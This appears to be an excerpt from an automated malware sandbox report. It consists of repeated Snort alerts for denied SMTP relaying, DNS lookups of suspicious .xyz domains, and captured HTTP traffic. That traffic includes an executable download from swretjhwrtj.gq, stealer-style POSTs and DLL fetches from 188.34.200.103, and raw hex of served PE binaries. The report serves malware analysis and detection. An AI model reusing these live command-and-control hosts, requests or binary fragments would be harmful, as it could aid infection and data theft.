Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.73.161:25 -> 192.168.2.7:49794
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.17.161:25 -> 192.168.2.7:49801
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.74.33:25 -> 192.168.2.7:49799
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.74.33:25 -> 192.168.2.7:49800
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.13.33:25 -> 192.168.2.7:49802
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.17.161:25 -> 192.168.2.7:49804
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.17.161:25 -> 192.168.2.7:49805
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.73.161:25 -> 192.168.2.7:49803
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.14.33:25 -> 192.168.2.7:49808
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.17.161:25 -> 192.168.2.7:49806
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.17.161:25 -> 192.168.2.7:49807
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.17.161:25 -> 192.168.2.7:49811
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.17.161:25 -> 192.168.2.7:49812
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.14.33:25 -> 192.168.2.7:49809
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.13.33:25 -> 192.168.2.7:49810
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.17.161:25 -> 192.168.2.7:49815
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.13.33:25 -> 192.168.2.7:49813
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.70.33:25 -> 192.168.2.7:49814
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.70.33:25 -> 192.168.2.7:49817
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.70.33:25 -> 192.168.2.7:49819
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.70.33:25 -> 192.168.2.7:49820
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.17.161:25 -> 192.168.2.7:49822
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.17.161:25 -> 192.168.2.7:49824
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.17.161:25 -> 192.168.2.7:49823
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.13.33:25 -> 192.168.2.7:49825
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 168.95.6.54:25 -> 192.168.2.7:49816
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.70.33:25 -> 192.168.2.7:49827
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.13.33:25 -> 192.168.2.7:49828
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.73.161:25 -> 192.168.2.7:49826
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.17.161:25 -> 192.168.2.7:49830
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.17.161:25 -> 192.168.2.7:49832
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.17.161:25 -> 192.168.2.7:49831
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.17.161:25 -> 192.168.2.7:49829
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.17.161:25 -> 192.168.2.7:49834
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.17.161:25 -> 192.168.2.7:49835
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.56.33:25 -> 192.168.2.7:49833
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.70.33:25 -> 192.168.2.7:49838
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.70.33:25 -> 192.168.2.7:49837
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.17.161:25 -> 192.168.2.7:49840
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.17.161:25 -> 192.168.2.7:49841
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.13.33:25 -> 192.168.2.7:49842
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.17.161:25 -> 192.168.2.7:49844
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.13.33:25 -> 192.168.2.7:49846
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.17.161:25 -> 192.168.2.7:49847
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.14.33:25 -> 192.168.2.7:49848
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.17.161:25 -> 192.168.2.7:49851
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.17.161:25 -> 192.168.2.7:49850
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.17.161:25 -> 192.168.2.7:49849
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.17.161:25 -> 192.168.2.7:49852
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.14.33:25 -> 192.168.2.7:49855
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.13.33:25 -> 192.168.2.7:49854
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.73.161:25 -> 192.168.2.7:49853
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.73.161:25 -> 192.168.2.7:49857
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.17.161:25 -> 192.168.2.7:49862
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.17.161:25 -> 192.168.2.7:49863
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.17.161:25 -> 192.168.2.7:49865
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.17.161:25 -> 192.168.2.7:49867
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.56.33:25 -> 192.168.2.7:49864
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.17.161:25 -> 192.168.2.7:49868
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.17.161:25 -> 192.168.2.7:49870
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.14.33:25 -> 192.168.2.7:49873
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.70.33:25 -> 192.168.2.7:49871
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.17.161:25 -> 192.168.2.7:49876
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.70.33:25 -> 192.168.2.7:49875
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.17.161:25 -> 192.168.2.7:49878
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.70.33:25 -> 192.168.2.7:49879
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.56.33:25 -> 192.168.2.7:49880
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.73.161:25 -> 192.168.2.7:49882
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.13.33:25 -> 192.168.2.7:49885
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.70.33:25 -> 192.168.2.7:49884
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.18.161:25 -> 192.168.2.7:49889
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.70.33:25 -> 192.168.2.7:49887
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.73.33:25 -> 192.168.2.7:49888
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.70.33:25 -> 192.168.2.7:49890
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.73.33:25 -> 192.168.2.7:49891
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.70.33:25 -> 192.168.2.7:49893
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.70.33:25 -> 192.168.2.7:49897
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.70.33:25 -> 192.168.2.7:49898
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.73.33:25 -> 192.168.2.7:49900
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 173.194.69.26:25 -> 192.168.2.7:49901
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.70.33:25 -> 192.168.2.7:49902
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.70.33:25 -> 192.168.2.7:49904
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.70.33:25 -> 192.168.2.7:49906
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.73.33:25 -> 192.168.2.7:49909
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.73.161:25 -> 192.168.2.7:49908
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.70.33:25 -> 192.168.2.7:49913
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.70.33:25 -> 192.168.2.7:49914
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.73.33:25 -> 192.168.2.7:49916
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.70.33:25 -> 192.168.2.7:49917
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.14.33:25 -> 192.168.2.7:49920
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.73.33:25 -> 192.168.2.7:49921
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.73.33:25 -> 192.168.2.7:49922
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.70.33:25 -> 192.168.2.7:49923
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.70.33:25 -> 192.168.2.7:49924
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.70.33:25 -> 192.168.2.7:49927
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.70.33:25 -> 192.168.2.7:49925
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.70.33:25 -> 192.168.2.7:49926
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.70.33:25 -> 192.168.2.7:49928
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.73.33:25 -> 192.168.2.7:49930
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.73.33:25 -> 192.168.2.7:49931
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.22.161:25 -> 192.168.2.7:49934
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.73.33:25 -> 192.168.2.7:49932
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.73.33:25 -> 192.168.2.7:49935
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.70.33:25 -> 192.168.2.7:49936
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.70.33:25 -> 192.168.2.7:49939
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.70.33:25 -> 192.168.2.7:49940
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.70.33:25 -> 192.168.2.7:49943
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.70.33:25 -> 192.168.2.7:49942
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.13.33:25 -> 192.168.2.7:49946
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.70.33:25 -> 192.168.2.7:49945
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.73.161:25 -> 192.168.2.7:49948
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.73.161:25 -> 192.168.2.7:49949
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.70.33:25 -> 192.168.2.7:49951
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.70.33:25 -> 192.168.2.7:49950
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.22.161:25 -> 192.168.2.7:49953
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.73.33:25 -> 192.168.2.7:49952
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 74.125.200.27:25 -> 192.168.2.7:49944
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.73.33:25 -> 192.168.2.7:49954
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.70.33:25 -> 192.168.2.7:49955
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.73.33:25 -> 192.168.2.7:49957
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.73.33:25 -> 192.168.2.7:49956
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.73.33:25 -> 192.168.2.7:49958
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.70.33:25 -> 192.168.2.7:49959
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.70.33:25 -> 192.168.2.7:49960
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.1.33:25 -> 192.168.2.7:49965
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.73.33:25 -> 192.168.2.7:49962
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.70.33:25 -> 192.168.2.7:49967
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.70.33:25 -> 192.168.2.7:49968
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.70.33:25 -> 192.168.2.7:49970
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.14.33:25 -> 192.168.2.7:49973
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.73.33:25 -> 192.168.2.7:49971
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.14.33:25 -> 192.168.2.7:49975
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.18.225:25 -> 192.168.2.7:49977
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.58.33:25 -> 192.168.2.7:49976
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.73.33:25 -> 192.168.2.7:49979
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 173.194.69.26:25 -> 192.168.2.7:49981
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.18.225:25 -> 192.168.2.7:49983
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.22.161:25 -> 192.168.2.7:49964
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.73.33:25 -> 192.168.2.7:49982
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.18.225:25 -> 192.168.2.7:49985
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.22.161:25 -> 192.168.2.7:49986
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.18.225:25 -> 192.168.2.7:49990
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.18.225:25 -> 192.168.2.7:49992
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.73.33:25 -> 192.168.2.7:49988
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.18.225:25 -> 192.168.2.7:49996
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.9.33:25 -> 192.168.2.7:49994
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.73.33:25 -> 192.168.2.7:49998
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.73.33:25 -> 192.168.2.7:49997
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.9.33:25 -> 192.168.2.7:50001
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 142.250.150.26:25 -> 192.168.2.7:49995
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.18.225:25 -> 192.168.2.7:50004
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.18.225:25 -> 192.168.2.7:50006
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.73.33:25 -> 192.168.2.7:50002
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 104.47.73.33:25 -> 192.168.2.7:50007
Source: Traffic	Snort IDS: 567 POLICY SMTP relaying denied 173.194.69.26:25 -> 192.168.2.7:50011

Uses known network protocols on non-standard ports

Show sources

Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 2080
Source: unknown	Network traffic detected: HTTP traffic on port 2080 -> 49720

Performs DNS queries to domains with low reputation

Show sources

Source: C:\Windows\explorer.exe	DNS query: readinglistforaugust1.xyz
Source: C:\Windows\explorer.exe	DNS query: readinglistforaugust2.xyz
Source: C:\Windows\explorer.exe	DNS query: readinglistforaugust3.xyz
Source: C:\Windows\SysWOW64\explorer.exe	DNS query: readinglistforaugust3.xyz
Source:	DNS query: fastpool.xyz

Source: global traffic	HTTP traffic detected: GET /@Rarenut0.exe HTTP/1.1Host: swretjhwrtj.gqConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /824 HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: 188.34.200.103Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Host: 188.34.200.103Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Host: 188.34.200.103Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Host: 188.34.200.103Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Host: 188.34.200.103Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Host: 188.34.200.103Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Host: 188.34.200.103Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 4955Host: 188.34.200.103Connection: Keep-AliveCache-Control: no-cache

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 24 Aug 2021 06:46:43 GMTContent-Type: application/x-msdos-programContent-Length: 24576Connection: keep-aliveKeep-Alive: timeout=3Last-Modified: Tue, 17 Aug 2021 14:34:32 GMTETag: "6000-5c9c2374e92ba"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 4b c4 db 9d 2a aa 88 9d 2a aa 88 9d 2a aa 88 1e 36 a4 88 9c 2a aa 88 f4 35 a3 88 9f 2a aa 88 74 35 a7 88 9c 2a aa 88 52 69 63 68 9d 2a aa 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ee fd 3a 5d 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 30 00 00 00 20 00 00 00 00 00 00 78 12 00 00 00 10 00 00 00 40 00 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 16 00 0b 00 04 00 00 00 00 00 00 00 00 60 00 00 00 10 00 00 83 62 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 2e 00 00 28 00 00 00 00 50 00 00 7c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 02 00 00 20 00 00 00 00 10 00 00 d4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 50 22 00 00 00 10 00 00 00 30 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 84 03 00 00 00 40 00 00 00 10 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 7c 0a 00 00 00 50 00 00 00 10 00 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 c3 1f b0 49 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 24 Aug 2021 06:46:44 GMTContent-Type: application/x-msdos-programContent-Length: 439296Connection: keep-aliveKeep-Alive: timeout=3Last-Modified: Tue, 24 Aug 2021 06:46:01 GMTETag: "6b400-5ca487caad1df"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 ce 1e c0 5f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 6e 05 00 00 7a 8a 02 00 00 00 00 1e 24 00 00 00 10 00 00 00 80 05 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 a0 8f 02 00 04 00 00 05 e4 06 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 30 c0 05 00 51 00 00 00 f0 b5 05 00 3c 00 00 00 00 d0 8e 02 98 c5 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 81 05 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 9d 05 00 18 00 00 00 d8 9c 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 80 05 00 b0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 81 6c 05 00 00 10 00 00 00 6e 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 81 40 00 00 00 80 05 00 00 42 00 00 00 72 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 38 f2 88 02 00 d0 05 00 00 3a 00 00 00 b4 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 98 c5 00 00 00 d0 8e 02 00 c6 00 00 00 ee 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 